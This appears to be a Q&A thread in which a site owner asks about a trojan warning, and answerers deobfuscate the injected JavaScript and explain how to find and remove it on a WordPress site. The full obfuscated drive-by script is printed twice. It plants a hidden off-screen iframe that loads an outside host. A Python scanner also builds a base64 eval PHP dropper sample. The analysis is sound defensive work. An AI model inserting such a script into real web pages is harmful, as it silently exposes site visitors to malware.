Hidden Trojan on my website - How to find it?


Solution 1

The reported URL www.f1arab.com does not contain this piece of JS code at first sight.

So, looking at the script we can figure out what it is trying to send you to:

var wow = "b3nimb2eawiki11b1infob1ms"; var url = "h"+"ttp"+":/"+"/"+wow.replace(/ea/g,"-").replace(/b3/g,"a").replace(/b2/g, "e").replace(/b1/g,".")+":8"+"1/"+"rem"+"2."+"htm"+"l"; document.write(url);

which yields:

http://anime-wiki11.info.ms:81/rem2.html

Querying this URL twice, we see on the first attempt that it can't find a page on Yahoo, and on the second that it can't load at all. If you search Google for the b3nimb2eawiki11b1infob1ms string, you see that these exploit attempts are quite dated, and it appears that Yahoo already took them offline.

Searching for the URL you obtain, you see my attempts to query it as well as two sites also infected with this script. But as it shows, the script is no longer harmful, so it is safe to visit both URLs assuming Yahoo doesn't put it back.

When doing yet another check with urlQuery on the reported URL, we see this request happening:

GET /rem2.html HTTP/1.1
Host: mrzwheremeread.info.br.ms:81

But once again this URL leads to something Yahoo already took offline.

The interesting thing is that this is different from the URL shown in your question, thus it is being dynamically generated. So that's why a quick search earlier on did not find the JS code.

This is evidenced by the following HTML code being injected at a certain point:

<script type="text/javascript">/*<![CDATA[*/var wow="mrzwhb2rb2mb2rb2b3db1infob1brb1ms";c1="l"+"on"+"l"+"y";if(-1==document.cookie.indexOf(c1)){var a=new Date;a.setTime(a.getTime());c3=72E6;c2=new Date(a.getTime()+c3);document.cookie=c1+"="+escape(c2.toGMTString())+";e"+"xpir"+"es="+c2.toGMTString()+";p"+"at"+"h=/";var a=document.createElement("if"+"r"+"am"+"e");a.setAttribute("sr"+"c","h"+"ttp"+":/"+"/"+wow.replace(/ea/g,"-").replace(/b3/g,"a").replace(/b2/g,"e").replace(/b1/g,".")+":8"+"1/"+"rem"+"2."+"htm"+"l");a.style.position="ab"+"sol"+"ute";a.style.width="1"+"8p"+"x";a.setAttribute("f"+"ra"+"mebo"+"rd"+"er",navigator.userAgent.indexOf("1"+"23"+"4231"+"532"+"4")+1);a.style.left="-"+"57"+"50"+"p"+"x";document.write("<"+"di"+"v i"+"d='d"+"efus"+"e'>"+"</di"+"v>");document.getElementById("de"+"f"+"us"+"e").appendChild(a)};/*]]>*/</script>

As we can see on urlQuery, this code isn't being injected through JavaScript, so this must be happening server side. What we also see here, through wp-content, is that you are using WordPress, so it is most likely that they are using a WordPress exploit to insert that code.

Start by updating WordPress and the plugins, as well as disabling things that you don't need. From there on, you can look into making file permissions a bit more restrictive on the server, as well as PHP settings that disallow writing from or to places you don't want.

Also, searching for var wow or just wow across all hosted files on the server would be a nice approach, as that part seems not to be dynamic; please note that it might appear in an encrypted form, which might require you to search manually...

Solution 2

You can also scan your site at http://sitecheck.sucuri.net/scanner/

Common forms of malware inject PHP code into your index.php files, which then generates the JavaScript. The PHP doesn't look like the JavaScript; it may be base64 encoded, or it may not.

It's also possible you have rogue php files on your site inserting the code into your index files as well. In that case you need to find those files. Good hosting companies can scan your account quickly to find backdoor shells.

If you run WordPress it may also be coming from entries in your database.
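As an added example (not code from either answer), the Python script below applies the same four substitutions, in the same order as the script's replace() calls, to recover the iframe target from a wow string, and then searches hosted files for the var wow marker, including inside base64 blobs such as the base64-encoded PHP form described in Solution 2. The sample file contents are constructed, not taken from the asker's site.

```python
import base64
import binascii
import os
import re

# Substitution chain from the injected script, applied in the same order as its replace() calls.
SUBSTITUTIONS = (("ea", "-"), ("b3", "a"), ("b2", "e"), ("b1", "."))
# The `var wow="..."` assignment is the one part of the injection not assembled from string fragments.
MARKER_RE = re.compile(r'var\s+wow\s*=\s*"([^"]+)"')
# Long base64-looking runs, such as the argument of base64_decode() in a PHP dropper.
BLOB_RE = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")

def decode_wow(token: str) -> str:
    """Rebuild the hidden iframe target (http://<host>:81/rem2.html) from a `wow` string."""
    host = token
    for needle, replacement in SUBSTITUTIONS:
        host = host.replace(needle, replacement)
    return f"http://{host}:81/rem2.html"

def scan_text(text: str, depth: int = 2) -> list[tuple[str, str]]:
    """Return (form, decoded target) for each copy of the injection; base64 blobs are decoded and rescanned."""
    hits = [("plain", decode_wow(m.group(1))) for m in MARKER_RE.finditer(text)]
    for blob in (BLOB_RE.finditer(text) if depth else ()):
        raw = blob.group(0)
        try:
            decoded = base64.b64decode(raw + "=" * (-len(raw) % 4)).decode("latin-1")
        except binascii.Error:
            continue  # not valid base64, so nothing hidden in this run
        hits += [("base64", target) for _, target in scan_text(decoded, depth - 1)]
    return hits

def scan_tree(root: str, suffixes=(".php", ".js", ".html", ".htm")) -> dict[str, list]:
    """Scan every web file under `root`: a grep for `var wow` that also looks inside base64."""
    report = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.endswith(suffixes):
                path = os.path.join(dirpath, name)
                with open(path, encoding="latin-1") as fh:
                    hits = scan_text(fh.read())
                if hits:
                    report[path] = hits
    return report

# Constructed samples (not files from the asker's site): the plain injection and a base64-wrapped PHP dropper.
INJECTED_JS = '<script>var wow="b3nimb2eawiki11b1infob1ms";/* remaining fragments omitted */</script>'
PHP_DROPPER = '<?php eval(base64_decode("' + base64.b64encode(INJECTED_JS.encode()).decode() + '")); ?>'
```

Run scan_tree on the web root to get a per-file report; the decoded target tells you which host each copy points at, which is useful when the injection is regenerated with a different wow string as Solution 1 observed.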


Author: Kilwa2012

Updated on September 18, 2022

Comments

  • Kilwa2012
    Kilwa2012 almost 2 years

    I have a big problem. Kaspersky says my website is infected with a trojan. So I downloaded my whole website and ran a scan, and it was clean. I also ran ClamAV on it, and it was clean too.

    So the next thing I did was tell a few guys to test it, and when they go to my website the warning appears, not only in Kaspersky but in Norton too.

    I think it's a hidden trojan, like when you refresh the page you see the warning while it's hidden in files.

    Kaspersky gave me the following code

    <script type='text/javascript'>/*<![CDATA[*/var wow="b3nimb2eawiki11b1infob1ms";c1="l"+"on"+"l"+"y";if(-1==document.cookie.indexOf(c1)){var a=new Date;a.setTime(a.getTime());c3=72E6;c2=new Date(a.getTime()+c3);document.cookie=c1+"="+escape(c2.toGMTString())+";e"+"xpir"+"es="+c2.toGMTString()+";p"+"at"+"h=/";var a=document.createElement("if"+"r"+"am"+"e");a.setAttribute("sr"+"c","h"+"ttp"+":/"+"/"+wow.replace(/ea/g,"-").replace(/b3/g,"a").replace(/b2/g, "e").replace(/b1/g,".")+":8"+"1/"+"rem"+"2."+"htm"+"l");a.style.position="ab"+"sol"+"ute";a.style.width="1"+"8p"+"x";a.setAttribute("f"+"ra"+"mebo"+"rd"+"er",navigator.userAgent.indexOf("1"+"23"+"4231"+"532"+"4")+1);a.style.left="-"+"57"+"50"+"p"+"x";document.write("<"+"di"+"v i"+"d='d"+"efus"+"e'>"+"</di"+"v>");document.getElementById("de"+"f"+"us"+"e").appendChild(a)};/*]]>*/</script>


    So now I am lost, what can I do?

    • Admin
      Admin almost 12 years
      Please don't cross post questions. Your Super User question could have been migrated.
    • Admin
      Admin almost 12 years
      You need to include what server you're using, what programming language you are using and any third party software you're using, e.g. WordPress.
  • John Conde
    John Conde almost 12 years
    I didn't say I envied them!
  • Kilwa2012
    Kilwa2012 almost 12 years
    Hello, I found 2 infected files after hours and hours of work. I would like to thank TomWij for his help. Please guys, can you check if my site is working for you now?
  • bekay
    bekay almost 12 years
    I would suggest you ask your hosting company to do a scan as well. If this helped you feel free to mark it as the answer.